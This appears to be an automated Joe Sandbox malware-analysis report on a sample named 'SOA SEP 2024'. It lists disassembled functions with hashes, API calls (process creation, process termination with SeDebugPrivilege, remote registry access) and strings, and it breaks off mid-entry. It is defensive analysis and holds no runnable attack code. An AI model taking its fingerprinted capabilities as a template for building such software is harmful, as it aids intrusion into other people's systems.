Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: a401421970a97ab40ab6a9251c564a5d0b2a03cb7f3bc2833c0d9af258821c10
Instruction ID: ce4f16c343e431689965dfe7036b0b33449abf5d17dbb02afaa06287bcba1c90
Opcode Fuzzy Hash: a401421970a97ab40ab6a9251c564a5d0b2a03cb7f3bc2833c0d9af258821c10
Instruction Fuzzy Hash: D9518A70204304EFDB20DF20DC9AF6A77E5FB98704F10892DF995972A2DB799948CB52

Function 007BB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,007FDC00), ref: 007BB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007FDC00), ref: 007BB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007BB8C1
SysFreeString.OLEAUT32(?), ref: 007BB8EB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 571f2959e41dd00161c3c22aacb8137780620840db609000e4b0a44ba23b8069
Instruction ID: ad8fae6d222fa0be75387a99dd9f4c48efbd8873bd2e689736978126dcf8a6d9
Opcode Fuzzy Hash: 571f2959e41dd00161c3c22aacb8137780620840db609000e4b0a44ba23b8069
Instruction Fuzzy Hash: 16F11875A00209EFCB14DFA4C888EEEB7B9FF89315F108459F905AB250DB75AE45CB90

Function 007C24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007C24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007C2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007C26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007C26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007C270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007C28A1
CloseHandle.KERNEL32(?), ref: 007C28D0
CloseHandle.KERNEL32(?), ref: 007C2947

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 0c9178922e228ae22c41d4c65868535c8ec9bc37c0c4451edd8c963e8fdfd29d
Instruction ID: df443bd5b12a8c3007621050b02fd98d7a2db91a01902aace449529c406d89c0
Opcode Fuzzy Hash: 0c9178922e228ae22c41d4c65868535c8ec9bc37c0c4451edd8c963e8fdfd29d
Instruction Fuzzy Hash: F6D1AE31604200DFCB15EF24C895F6ABBE5BF89310F14855DF98A9B2A2DB39EC45CB52

Function 007CB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007CB3F4

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: a0f6e7706f115f0ad53423a998b4ddd36a9484b14d5dfba9f10ef0841bcfaa04
Instruction ID: ce35e64a29d19f298b1e744d7cb02db816a251e5309ac9eacc98c6ce291d9ec3
Opcode Fuzzy Hash: a0f6e7706f115f0ad53423a998b4ddd36a9484b14d5dfba9f10ef0841bcfaa04
Instruction Fuzzy Hash: 76519D30600284FBEF349B289CCAFAD3B64FB05364F64801EFA15D61E2D779E9548A51

Function 0077A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007DDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007DDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007DDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007DDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0077A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 007DDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007DDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0077A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 007DDBC8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 38bd36fb7e642944aea66c7cee4788b91bb238ab7bbf935aac963a03adc4dc3b
Instruction ID: c1b9354296602710475001dcb365edca31b83991a5047c21a7f011f185a57587
Opcode Fuzzy Hash: 38bd36fb7e642944aea66c7cee4788b91bb238ab7bbf935aac963a03adc4dc3b
Instruction Fuzzy Hash: FE516D70600209EFEF24DF64CC85FAE77B5FB98794F108519F94A96290D7B8AD80DB90

Function 007A7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007A6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A5FA6,?), ref: 007A6ED8

Part of subcall function 007A6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A5FA6,?), ref: 007A6EF1

Part of subcall function 007A72CB: GetFileAttributesW.KERNEL32(?,007A6019), ref: 007A72CC

lstrcmpiW.KERNEL32(?,?), ref: 007A75CA
_wcscmp.LIBCMT ref: 007A75E2
MoveFileW.KERNEL32(?,?), ref: 007A75FB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: b06048cf5e7dc36f37f3dc6ce71c9badb3894dd1b30e30c3bc2b461501d8f0c7
Instruction ID: 6e72ad957058fcd6c1120182ab7e96bda9845b225e06bd54fe105cff784b105e
Opcode Fuzzy Hash: b06048cf5e7dc36f37f3dc6ce71c9badb3894dd1b30e30c3bc2b461501d8f0c7
Instruction Fuzzy Hash: 225151B2A492199EDF54EB94DC45DDE73BCAF49310B00419AF605E3041EA78D6C9CB70

Function 0077EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007DDAD1,00000004,00000000,00000000), ref: 0077EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,007DDAD1,00000004,00000000,00000000), ref: 0077EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,007DDAD1,00000004,00000000,00000000), ref: 007DDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007DDAD1,00000004,00000000,00000000), ref: 007DDCF2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 540e8b88ac3e252de3c7f2c6c049d7b028fc91ad4116af6bfba489157e878294
Instruction ID: 1d9941f601834e3dd67391b63b612bbb43dcb0ac41da71d623ce6a045f46e64c
Opcode Fuzzy Hash: 540e8b88ac3e252de3c7f2c6c049d7b028fc91ad4116af6bfba489157e878294
Instruction Fuzzy Hash: BE41C5B02152809EDF3547288DCDE3A7EA6AB5D384F19C49AE08F86A71D67D6C80D721

Function 0079B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0079AEF1,00000B00,?,?), ref: 0079B26C
HeapAlloc.KERNEL32(00000000,?,0079AEF1,00000B00,?,?), ref: 0079B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0079AEF1,00000B00,?,?), ref: 0079B288
GetCurrentProcess.KERNEL32(?,00000000,?,0079AEF1,00000B00,?,?), ref: 0079B290
DuplicateHandle.KERNEL32(00000000,?,0079AEF1,00000B00,?,?), ref: 0079B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0079AEF1,00000B00,?,?), ref: 0079B2A3
GetCurrentProcess.KERNEL32(0079AEF1,00000000,?,0079AEF1,00000B00,?,?), ref: 0079B2AB
DuplicateHandle.KERNEL32(00000000,?,0079AEF1,00000B00,?,?), ref: 0079B2AE
CreateThread.KERNEL32(00000000,00000000,0079B2D4,00000000,00000000,00000000), ref: 0079B2C8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 1d1e62a1ca3d5ec6d67a70ee0aaeda76bd297f9506a8d3d1e3804f52fe3fe428
Instruction ID: 801f6d76d1fea561fd49ce1ba90a45c44054b54ecdd5cf08540f944bf03c608a
Opcode Fuzzy Hash: 1d1e62a1ca3d5ec6d67a70ee0aaeda76bd297f9506a8d3d1e3804f52fe3fe428
Instruction Fuzzy Hash: 9201BFB5241348BFE720ABA5DD8DF5B7BACEB88711F018411FA15DF191C6B59C00CB65

Function 007BC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 007BC876, 007BC887
Not an Object type, xrefs: 007BC49E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 725aa44e9225a7caa9be6bfbd0e8c8aff804fbee0d8dbda4d7ea8b7bf93139a5
Instruction ID: ce1c3414fca8ca9e9a4f5d7de1d49e2f2ccf896c86906221068d00fcb296743f
Opcode Fuzzy Hash: 725aa44e9225a7caa9be6bfbd0e8c8aff804fbee0d8dbda4d7ea8b7bf93139a5
Instruction Fuzzy Hash: 0FE1A071A00219AFDF25DFA8D885BEE77B9EF48314F14C029F905AB281D778AD41CB90

Function 007BBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007BBB5C
VariantInit.OLEAUT32(?), ref: 007BBC2D
VariantInit.OLEAUT32(?), ref: 007BBD2E
VariantClear.OLEAUT32(?), ref: 007BBD38
VariantClear.OLEAUT32(?), ref: 007BBD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 007BBD11
Null Object assignment in FOR..IN loop, xrefs: 007BBBBD, 007BBCEB, 007BBDA7

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: fc43785b17060f3885f3ed73a0a4055f728bbb0bd2c08816393cd20797747a8d
Instruction ID: 9c3e2273eaa1dd5019c64ac4e2d79ab144e80c5ad14e7ecbd467e208a1c7ba9c
Opcode Fuzzy Hash: fc43785b17060f3885f3ed73a0a4055f728bbb0bd2c08816393cd20797747a8d
Instruction Fuzzy Hash: 01918271A00215EBDF24CF95CC48FEEBBB8EF45710F108559F915AB281DBB89945CBA0

Function 007686C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00767DBD

Strings

], xrefs: 00767D9F
^, xrefs: 00767D96
Q\E, xrefs: 007686D6
\, xrefs: 00767E1D
\, xrefs: 00767D89
[, xrefs: 00767E14

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$\$\$]$^
API String ID: 2102423945-1026548749
Opcode ID: 072553f0e3d83bbaecb3b2e34986da20f27135e9f53568d5983da571004a2429
Instruction ID: 6215f4353eb6166bd35955e596645980ce4525b4e8628d58368cde9eead189b6
Opcode Fuzzy Hash: 072553f0e3d83bbaecb3b2e34986da20f27135e9f53568d5983da571004a2429
Instruction Fuzzy Hash: ED518171E00249DBDF64CF98C8816ADB7B1FF94314F28826AD81AB7351E7389D85CB91

Function 007C9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 007C9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C9B47
_wcscat.LIBCMT ref: 007C9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 007C9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C9BE7

Strings

SysListView32, xrefs: 007C9AEB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 0e6661ed2e890d164f58270ebc8a4779de95d672a13cb1cb31e3a4eb41a5ee91
Instruction ID: 4423c7f721b9f66bee7c7832ddb55d3b2e2954dcd69365111a7e838576a9fedf
Opcode Fuzzy Hash: 0e6661ed2e890d164f58270ebc8a4779de95d672a13cb1cb31e3a4eb41a5ee91
Instruction Fuzzy Hash: 1E416D71A40248ABDB219FA4DC89FEE77A8EF08350F10442EF649A7291D6799D84CB64

Function 007C172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 007A6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007A6554
Part of subcall function 007A6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007A6564
Part of subcall function 007A6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007A65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C179A
GetLastError.KERNEL32 ref: 007C17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 007C1855
GetLastError.KERNEL32(00000000), ref: 007C1860
CloseHandle.KERNEL32(00000000), ref: 007C1895

Strings

SeDebugPrivilege, xrefs: 007C17B8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a714788e6d355d7bfab0bd5cd5a35f8b7f92e120fdf02289e22d27448678ea4a
Instruction ID: 31a6b8a1402149de9548a857a1302663eaba4e2ce238605b05c8d752709271ed
Opcode Fuzzy Hash: a714788e6d355d7bfab0bd5cd5a35f8b7f92e120fdf02289e22d27448678ea4a
Instruction Fuzzy Hash: 1A418972600200EFDB16EF54C8A9F6DB7E5AF59310F05806CF9069F282DB7DA9058B95

Function 007A5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 007A58B8

Strings

question, xrefs: 007A5871
blank, xrefs: 007A583A
stop, xrefs: 007A5889
info, xrefs: 007A5859
warning, xrefs: 007A58A1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 94cdf08bdd3fcba11392b3f2c6183e373e4a9dd6cefc5931115cd6912b2c52f1
Instruction ID: 809ea1adc28f0935743731884315bff4ce20ab460a478afc9fa40eb7dca462c0
Opcode Fuzzy Hash: 94cdf08bdd3fcba11392b3f2c6183e373e4a9dd6cefc5931115cd6912b2c52f1
Instruction Fuzzy Hash: D1110A32349742FAE7115B559C82DAE339CEF67324F20013AF611E6281E7ACAA4043A8

Function 007AA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007AA806

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 8569a5bef72a5adbf187f2e3f0ceb1ad36849e0b6034c6d6fb93e79ebfb3aba4
Instruction ID: dc98ae3fa8fb7b28e1d33f647a987eb55fda360608c1c1df1110ebc8e51adddb
Opcode Fuzzy Hash: 8569a5bef72a5adbf187f2e3f0ceb1ad36849e0b6034c6d6fb93e79ebfb3aba4
Instruction Fuzzy Hash: 0EC1AF75A0121AEFDB14CF98C485BAEB7F4FF4A311F20816AE605EB241D738AD41CB91

Function 007A6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007A6B63
LoadStringW.USER32(00000000), ref: 007A6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007A6B80
LoadStringW.USER32(00000000), ref: 007A6B87
_wprintf.LIBCMT ref: 007A6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 007A6BA8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 18b213673cf5793fccd56c1eab2469116d28934ac82707cc7334ce1d7fa3fa40
Instruction ID: 4dfbfc028855cefc02dbf26c91706ffa8d023ed03b06af70d6261aa23d07f1a9
Opcode Fuzzy Hash: 18b213673cf5793fccd56c1eab2469116d28934ac82707cc7334ce1d7fa3fa40
Instruction Fuzzy Hash: 650136F6500248BFEB21A7949DC9EF7776CD70C304F0085A5B755D6141EA789E848F74

Function 007C2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2BB5,?,?), ref: 007C3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2BF6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

